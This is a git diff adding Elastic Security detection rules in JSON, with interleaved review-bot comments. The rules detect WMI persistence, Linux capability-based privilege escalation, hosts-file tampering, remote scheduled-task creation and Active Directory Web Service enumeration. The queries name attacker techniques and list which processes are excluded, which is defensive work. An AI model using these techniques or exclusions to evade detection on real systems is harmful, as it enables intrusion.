"9aa0e1f6-52ce-42e1-abb3-09657cee2698", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110.json new file mode 100644 index 00000000000..fc624d7b8d3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Event Subscription", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"create\" and\n process.args : (\"ActiveScriptEventConsumer\", \"CommandLineEventConsumer\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, 
users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.003", + "name": "Windows Management Instrumentation Event Subscription", + "reference": "https://attack.mitre.org/techniques/T1546/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111.json new file mode 100644 index 00000000000..f30772b563c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Event Subscription", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"create\" and\n process.args : (\"ActiveScriptEventConsumer\", \"CommandLineEventConsumer\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work 
effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.003", + "name": "Windows Management Instrumentation Event Subscription", + "reference": "https://attack.mitre.org/techniques/T1546/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9b80cb26-9966-44b5-abbf-764fbdbc3586_2.json b/packages/security_detection_engine/kibana/security_rule/9b80cb26-9966-44b5-abbf-764fbdbc3586_2.json new file mode 100644 index 00000000000..897652b8b49 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9b80cb26-9966-44b5-abbf-764fbdbc3586_2.json 
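Review bot: The `index` list in this hunk narrows the endpoint pattern to `logs-endpoint.events.process-*` but leaves `logs-windows.*` broad, while the sibling rules added in this commit (9a5b4e31_109, 9aa0e1f6_109) use `logs-windows.sysmon_operational-*`; if the intent is Sysmon process-creation events, the narrower pattern is the consistent choice and avoids scanning unrelated windows datasets on every run. The `tags` array also lists only `Data Source: Elastic Endgame` and `Data Source: Elastic Defend`, although `index` includes Sysmon and `logs-system.security*` data, so the data-source tags appear incomplete relative to the indices actually queried. If the tag set is produced by tooling rather than hand-edited, this is worth raising upstream rather than patching here.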
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a process (granted CAP_SETUID and/or CAP_SETGID capabilities) is executed, after which the user's access is elevated to UID/GID 0 (root). In Linux, the CAP_SETUID and CAP_SETGID capabilities allow a process to change its UID and GID, respectively, providing control over user and group identity management. Attackers may leverage a misconfiguration for exploitation in order to escalate their privileges to root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via CAP_SETUID/SETGID Capabilities", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name != null and\n (process.thread.capabilities.effective : \"CAP_SET?ID\" or process.thread.capabilities.permitted : \"CAP_SET?ID\") and \n user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and \n (process.thread.capabilities.effective : \"CAP_SET?ID\" or process.thread.capabilities.permitted : \"CAP_SET?ID\")\n and user.id == \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9b80cb26-9966-44b5-abbf-764fbdbc3586", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "9b80cb26-9966-44b5-abbf-764fbdbc3586_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_108.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_108.json new file mode 100644 index 00000000000..71411de9e26 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_108.json 
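Review bot: This sequence rule is the only new rule in this set without `"timestamp_override": "event.ingested"`, while every sibling rule in the commit (for example 9b6813a1_111 and 9aa0e1f6_109) sets it; with `maxspan=1s` and no override, events whose `@timestamp` lags ingestion can be evaluated outside the rule's lookback window, so the two-step sequence may never be matched. Unless the omission is deliberate, add `"timestamp_override": "event.ingested"` next to `"type": "eql"`. The `index` list is also left at the broad `logs-endpoint.events.*` even though both sequence steps are `process where` queries; the sibling rules in this commit narrow to `logs-endpoint.events.process-*`, which would be the consistent form here.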
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Hosts File Modified", + "note": "## Triage and analysis\n\n### Investigating Hosts File Modified\n\nOperating systems use the hosts file to map a connection between an IP address and domain names before going to domain name servers. Attackers can abuse this mechanism to route traffic to malicious infrastructure or disrupt security that depends on server communications. For example, Russian threat actors modified this file on a domain controller to redirect Duo MFA calls to localhost instead of the Duo server, which prevented the MFA service from contacting its server to validate MFA login. This effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to \"Fail open\" if the MFA server is unreachable. This can happen in any MFA implementation and is not exclusive to Duo. Find more details in this [CISA Alert](https://www.cisa.gov/uscert/ncas/alerts/aa22-074a).\n\nThis rule identifies modifications in the hosts file across multiple operating systems using process creation events for Linux and file events in Windows and macOS.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as role, criticality, and associated users.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the changes to the hosts file by comparing it against file backups, volume shadow copies, and other restoration mechanisms.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and the configuration was justified.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of the administrator account that performed the action.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where\n\n /* file events for creation; file change events are not captured by some of the included sources for linux and so may\n miss this, which is the purpose of the process + command line args logic below */\n (\n event.category == \"file\" and event.type in (\"change\", \"creation\") and\n file.path : (\"/private/etc/hosts\", \"/etc/hosts\", \"?:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\") and \n not process.name in (\"dockerd\", \"rootlesskit\", \"podman\", \"crio\")\n )\n or\n\n /* process events for change targeting linux only */\n (\n event.category == \"process\" and event.type in (\"start\") and\n process.name in (\"nano\", \"vim\", \"vi\", \"emacs\", \"echo\", \"sed\") and\n process.args : (\"/etc/hosts\") and \n not process.parent.name in (\"dhclient-script\", \"google_set_hostname\")\n )\n", + "references": [ + "https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-reference-yml.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", 
+ "setup": "## Setup\n\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1565", + "name": "Data Manipulation", + "reference": "https://attack.mitre.org/techniques/T1565/", + "subtechnique": [ + { + "id": "T1565.001", + "name": "Stored Data Manipulation", + "reference": "https://attack.mitre.org/techniques/T1565/001/" + } + ] + } + ] + } + ], + "timeline_id": "4d4c0b59-ea83-483f-b8c1-8c360ee53c5c", + "timeline_title": "Comprehensive File Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "9c260313-c811-4ec8-ab89-8f6530e0246c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_8.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_8.json new file mode 100644 index 00000000000..3e67232a1f0 --- /dev/null 
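Review bot: The `index` list for Hosts File Modified keeps the broad `logs-endpoint.events.*` and `logs-windows.*` patterns even though the query only touches the `file` and `process` event categories; the other rules added in this commit narrow to per-dataset patterns (`logs-endpoint.events.process-*`, `logs-endpoint.events.registry-*`), so `logs-endpoint.events.file-*` plus `logs-endpoint.events.process-*` would be the consistent choice. The in-query comment explains that the process branch (the fixed editor list writing `/etc/hosts`) exists because some Linux sources do not emit file change events, but the `setup` text says nothing about it; a sentence there such as `On Linux sources without file change events, coverage is limited to the process-based fallback in the query.` would tell analysts which data sources have reduced coverage. The `tags` list only `Data Source: Elastic Defend` while `index` also includes `auditbeat-*` and `winlogbeat-*`, which may be a tooling convention but looks inconsistent with the indices queried.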
+++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_8.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies scheduled task creation from a remote source. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Scheduled Task Creation via RPC", + "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the TaskContent value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. 
Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n- Remote Scheduled Task Creation - 954ee7c8-5437-49ae-b2d6-2960883898e9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", + "query": "iam where event.action == \"scheduled-task-created\" and \n winlog.event_data.RpcCallClientLocality : \"0\" and winlog.event_data.ClientProcessId : \"0\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ClientProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RpcCallClientLocality", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "9c865691-5599-447a-bac9-b3f2df5f9a9d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": 
"https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "9c865691-5599-447a-bac9-b3f2df5f9a9d_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c951837-7d13-4b0c-be7a-f346623c8795_1.json b/packages/security_detection_engine/kibana/security_rule/9c951837-7d13-4b0c-be7a-f346623c8795_1.json new file mode 100644 index 00000000000..dbdabb4739e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9c951837-7d13-4b0c-be7a-f346623c8795_1.json 
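Review bot: This rule ships without a `setup` field even though it keys on `event.action == "scheduled-task-created"` read from the Security log via `logs-system.security*`, while sibling rules in this diff (e.g. `9ccf3ce0-0057-440a-91f5-870c6ad39093_109`) carry a `## Setup` section. Task-creation events only reach the Security log when the corresponding object-access audit subcategory is enabled on the host, so a deployment without it will silently never fire; I would add a `setup` entry naming the audit policy that must be on (to be confirmed against the system integration docs) and stating that `winlog.event_data.RpcCallClientLocality` and `winlog.event_data.ClientProcessId` must be mapped, since `required_fields` lists both as `"type": "unknown"`. The `note` also says the task action is "captured within the registry event data for this rule", which does not describe an `iam`-category Security-log event; that sentence is presumably carried over from the related rule `954ee7c8-5437-49ae-b2d6-2960883898e9` and should be reworded to refer to the event's `TaskContent` data instead.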
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes loading Active Directory related modules followed by a network connection to the ADWS dedicated TCP port. Adversaries may abuse the ADWS Windows service that allows Active Directory to be queried via this web service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Enumeration via Active Directory Web Service", + "query": "sequence by process.entity_id with maxspan=3m\n [library where host.os.type == \"windows\" and \n dll.name : (\"System.DirectoryServices*.dll\", \"System.IdentityModel*.dll\") and \n not user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and \n not process.executable : \n (\"?:\\\\windows\\\\system32\\\\dsac.exe\", \n \"?:\\\\program files\\\\powershell\\\\?\\\\pwsh.exe\", \n \"?:\\\\windows\\\\system32\\\\windowspowershell\\\\*.exe\", \n \"?:\\\\windows\\\\syswow64\\\\windowspowershell\\\\*.exe\", \n \"?:\\\\program files\\\\microsoft monitoring agent\\\\*.exe\", \n \"?:\\\\windows\\\\adws\\\\microsoft.activedirectory.webservices.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 9389 and source.port >= 49152 and\n network.direction == \"egress\" and network.transport == \"tcp\" and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"::1/128\")]\n", + "references": [ + "https://github.com/FalconForceTeam/SOAPHound" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9c951837-7d13-4b0c-be7a-f346623c8795", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "9c951837-7d13-4b0c-be7a-f346623c8795_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_109.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_109.json new file mode 100644 index 00000000000..77e0aabe1c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_109.json 
